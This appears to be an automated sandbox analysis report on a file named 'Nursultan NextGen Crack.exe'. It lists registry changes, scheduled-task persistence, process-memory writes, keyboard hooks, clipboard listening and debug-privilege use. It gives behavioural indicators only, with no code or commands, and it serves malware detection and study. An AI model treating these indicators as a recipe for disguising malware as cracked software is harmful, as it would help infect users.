Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\679E80FBE29B63345BF612177149674C\SourceList C:\Windows\system32\msiexec.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\aida64extreme730.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\wininit N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Windows\SYSTEM32\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3092 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Users\Admin\AppData\Roaming\Nursultan NextGen Crack.exe
PID 3092 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan NextGen Crack.exe C:\Windows\system32\cmd.exe
PID 1280 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1280 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
